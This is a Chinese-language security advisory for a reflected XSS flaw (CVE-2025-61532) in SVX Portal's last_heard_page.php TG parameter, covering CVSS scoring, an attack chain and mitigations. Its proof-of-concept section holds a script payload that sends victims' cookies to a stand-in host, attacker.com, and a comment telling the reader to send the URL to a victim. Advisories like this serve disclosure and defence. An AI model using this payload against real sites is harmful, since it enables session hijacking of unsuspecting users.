CVE-2025-61532 SVX Portal 跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-61532

漏洞类型

跨站脚本攻击（XSS）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

SVX Portal

漏洞概述

CVE-2025-61532是SVX Portal v2.7A版本中存在的一个跨站脚本（XSS）漏洞。该漏洞位于last_heard_page.php组件中，通过TG参数触发，攻击者可以利用该漏洞在受害者浏览器中执行任意JavaScript代码。SVX Portal是一款用于管理SVX通信设备的Web门户软件，广泛应用于业余无线电和通信管理领域。由于该漏洞无需认证即可利用（PR:N），且仅需网络访问（AV:N），攻击者可以通过构造恶意链接诱骗用户点击，从而在用户浏览器上下文中执行任意代码。该漏洞的CVSS 3.1评分为6.1，属于中危级别，主要影响机密性和完整性（均为低），可用性不受影响。攻击场景为跨域脚本执行（S:C），意味着攻击代码可能在不同安全上下文中执行，扩大了攻击影响范围。受影响的组件last_heard_page.php通常用于显示通信记录列表，TG参数可能用于过滤或标识特定的通话组（Talk Group），攻击者通过在该参数中注入恶意脚本即可触发XSS漏洞。

技术细节

该XSS漏洞存在于SVX Portal v2.7A的last_heard_page.php组件中。具体而言，TG参数（Talk Group参数）在接收用户输入后，未经过充分的过滤、转义或编码处理就直接输出到HTML页面中，导致攻击者可以在参数值中注入恶意JavaScript代码。由于该参数通常通过URL的GET请求传递，攻击者可以构造包含恶意payload的URL链接。当受害者点击该链接时，恶意脚本将在受害者浏览器中以SVX Portal站点的安全上下文执行。由于漏洞利用无需认证（PR:N），攻击者只需诱导已登录或具有访问权限的用户点击恶意链接即可。攻击场景标记为S:C（Scope Changed），表明攻击者注入的脚本可能在不同于目标站点的安全上下文中执行，从而可能访问其他域的资源或执行更危险的操作。典型利用方式包括窃取用户会话Cookie、劫持用户会话、执行未授权操作、钓鱼攻击或通过浏览器漏洞进行进一步渗透。攻击者还可以利用此漏洞配合社会工程学手段，发送包含恶意URL的电子邮件或消息，诱骗管理员或普通用户点击，从而获取敏感信息或提升权限。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标系统运行SVX Portal v2.7A版本，并定位last_heard_page.php组件及其TG参数入口点。

STEP 2

步骤2：构造恶意Payload

攻击者构造包含恶意JavaScript代码的URL，在TG参数中注入XSS payload，如窃取Cookie、会话劫持或重定向到钓鱼页面。

STEP 3

步骤3：投递恶意链接

攻击者通过电子邮件、即时消息、论坛或其他社会工程学手段，将恶意URL发送给目标用户或管理员。

STEP 4

步骤4：触发漏洞

受害者点击恶意链接，浏览器向SVX Portal发送请求，服务器将未经过滤的TG参数值直接返回到响应页面中。

STEP 5

步骤5：执行恶意代码

恶意JavaScript在受害者浏览器中以SVX Portal站点的安全上下文执行，可窃取会话凭证、执行未授权操作或进行进一步攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-61532 - SVX Portal XSS PoC
# Vulnerability: Reflected XSS via TG parameter in last_heard_page.php
# Affected: SVX Portal v2.7A

import requests

TARGET_URL = "http://target-svx-portal/last_heard_page.php"

# Malicious payload injected via TG parameter
# The payload executes arbitrary JavaScript in the victim's browser context
payload = '<script>alert("XSS-CVE-2025-61532");document.location="http://attacker.com/steal?cookie="+document.cookie;</script>'

# Construct the malicious URL
params = {
    "TG": payload
}

# Send the crafted request
response = requests.get(TARGET_URL, params=params)

print(f"[*] Malicious URL: {response.url}")
print(f"[*] Status Code: {response.status_code}")
print("[*] Send this URL to a victim user to trigger the XSS vulnerability")

# Alternative simple URL-based PoC:
# http://target-svx-portal/last_heard_page.php?TG=<script>alert(document.cookie)</script>

影响范围

SVX Portal v2.7A

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）对TG参数输入进行白名单验证，仅允许字母数字字符；2）在输出到页面时使用HTML实体编码；3）部署WAF规则过滤常见XSS payload；4）为所有会话Cookie添加HTTPOnly属性，防止脚本访问；5）实施CSP策略限制内联脚本执行；6）监控异常URL请求模式，及时发现潜在攻击行为。